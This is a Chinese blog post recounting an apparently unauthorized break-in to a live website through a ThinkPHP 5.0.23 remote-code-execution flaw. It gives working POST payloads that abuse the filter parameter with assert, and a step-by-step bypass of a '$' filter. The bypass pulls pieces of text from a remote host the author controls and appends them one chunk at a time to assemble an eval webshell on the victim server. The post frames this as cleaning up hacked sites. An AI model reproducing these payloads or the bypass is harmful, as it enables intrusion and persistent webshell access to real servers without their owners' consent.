首页 > 编程语言 >Thinkphp 5.0.23一次艰难的利用(绕过限制)

Thinkphp 5.0.23一次艰难的利用(绕过限制)

时间:2023-02-25 18:46:18浏览次数:34  
标签:5.0 fopen xxxx get 23 Thinkphp php com method

今天打算做点好事,看看有没有被别人黑掉的站,修复一波。刚刚好,找到一个。用goby一扫,thinkphp5.x漏洞

 

 

 验证了一下,是没有问题的

然后准备用工具写下shell

 

 

 

 

 

发现根本不行,看来还是得手动测试..

 

这个漏洞我通过抓goby的包,发现他是这样利用的.

网址:xxxxx.com/?s=captcha

POST数据:_method=__construct&filter[0]=phpinfo&method=GET&get[0]=11111

其中fiflter[0]是函数名  ,get[0]是参数

我通过PHPINFO的查看,发现系统禁用了所有的命令执行函数

 

 

 看样子从系统命令写文件出去是没办法了...

之后打算用fputs(fopen("x.php","w"),"<?php assert($_POST['x'])?>");

这样子来写入,post数据包就是这样子.

_method=__construct&filter[0]=assert&method=GET&get[0]=fputs(fopen("x.php","w"),"<?php assert($_POST['x'])?>");

但是我发现,只要get[0]参数里带了$号,就执行失败..我寻思,这样的话不就无法定义变量了。那怎么搞一句话木马;

然后我就乱试啊! 试include远程包含,无果,再试file_get_contents() 这样操作,发现获取的是远程服务器的信息,并不能在本地运行.

之后想到一个方法,我们是不是可以用fwrite  a+的方式来 一个一个写进去.二话不说直接开干!

自己随便找个网站,无限制写入的。然后我这边就 http://xxxx.com/1.php吧

_method=__construct&filter[0]=assert&method=GET&get[0]=fwrite(fopen("3.php","w"),fread(fopen('http://xxxx.com/1.php','r'),1000));

我们第一步:xxxx.com/1.php的内容改成<    然后burp那边点send。让这个rce漏洞执行一遍,把<写入到3.php里面

接着我们要记得,后面就把写入方式w改成a+了。

_method=__construct&filter[0]=assert&method=GET&get[0]=fwrite(fopen("3.php","a+"),fread(fopen('http://xxxx.com/1.php','r'),1000));

之后我们再把xxxx.com/1.php改成?   然后burp再执行一遍.

然后再改成php 再执行一遍

再改成eva 再执行一遍

后面再l ($

再_POS

再T['x']);?>

这样一波操作下来,我们发现,我们的数据没有被拦截还成功写入进去了。强!!!!

 

 

 

成功拿下!之后就是找到被挂马的,清除一下,修复漏洞,开溜!

 

 

标签:5.0,fopen,xxxx,get,23,Thinkphp,php,com,method
From: https://www.cnblogs.com/mua888666mua/p/17155000.html

相关文章

  • 三天吃透MySQL八股文(2023最新整理)
    本文已经收录到Github仓库,该仓库包含计算机基础、Java基础、多线程、JVM、数据库、Redis、Spring、Mybatis、SpringMVC、SpringBoot、分布式、微服务、设计模式、架构、校......
  • 闲话 23.2.25
    闲话编▇▇则4.选手程序中只允许通过▇▇▇▇▇读写▇▇▇▇▇指定库函数▇▇▇▇▇▇▇▇▇▇的方式与外部环境通信。在程序中严禁▇▇▇▇▇试图▇▇▇▇▇使用......
  • test20230225考试总结
    前言Ihatequestionsthatalreadyexist!!我讨厌原题!!赛时得分明细:ABCDEFTotalRank10010010560443106A.P1993小K的农场题面给定长度为......
  • 2023最新MongoDB规范
    前言MongoDB是非关系型数据库的典型代表,DB-EnginesRanking数据显示,近年来,MongoDB在NoSQL领域一直独占鳌头。MongoDB是为快速开发互联网应用而设计的数据库系统,其数据模......
  • 2023.8 Java与Python
    Java与Python都一直在各种流行编程语言中名列前茅,也有很多相似之处。作为技术人员,我们不能把自己局限在某一项技术或编程语言中,而应该能针对具体场景快速选择适合的技术解......
  • 2023软件工程第二周开课博客
    介绍自己:我是石家庄铁道大学软件工程系王建民老师的一名2021届信2105-3班新生现状、经验和计划:我现状很糟糕,完全不会,跟同学差距太大,编程思维太差,学习懒散,态度不良,经常遇到......
  • 2023/2/25 考试总结
    题单:clickhereT1.P2542[AHOI2005]航线规划虽然一眼\(\mathtt{LCT}\),但没有思考(?)使用一种简陋的方式获得了\(\mathtt{50pts}\)。用树链剖分也可做。首先是逆序......
  • 开课博客,顺便把今天的水一下。 2023.2.25
    一、介绍自己  来自信息科学与技术学院的信2105-3班的孟德昊,喜欢打游戏看番剧,不喜欢学习,二、现状,经验和计划 现状就是学习不挂科就算成功,学习不是很上心,主要是没心......
  • 2023爬虫学习笔记 -- 解决爬虫Cookies问题
    一、目标地址https://xXXXXu.com/二、分析要获取的内容1、获取这些用户名字2、通过刷新页面,发现内容是通过Ajax加载,主要是通过max_id参数获取内容3、找到起始的max_id......
  • 助教工作总结202302
    一、助教工作的具体职责和任务:(1)协助并分担老师的工作,在线下对学生课上不理解的部分进行一定的指导,比如大作业的评分以及提供一些学习建议。(2)询问其他助教,分析目前学生的......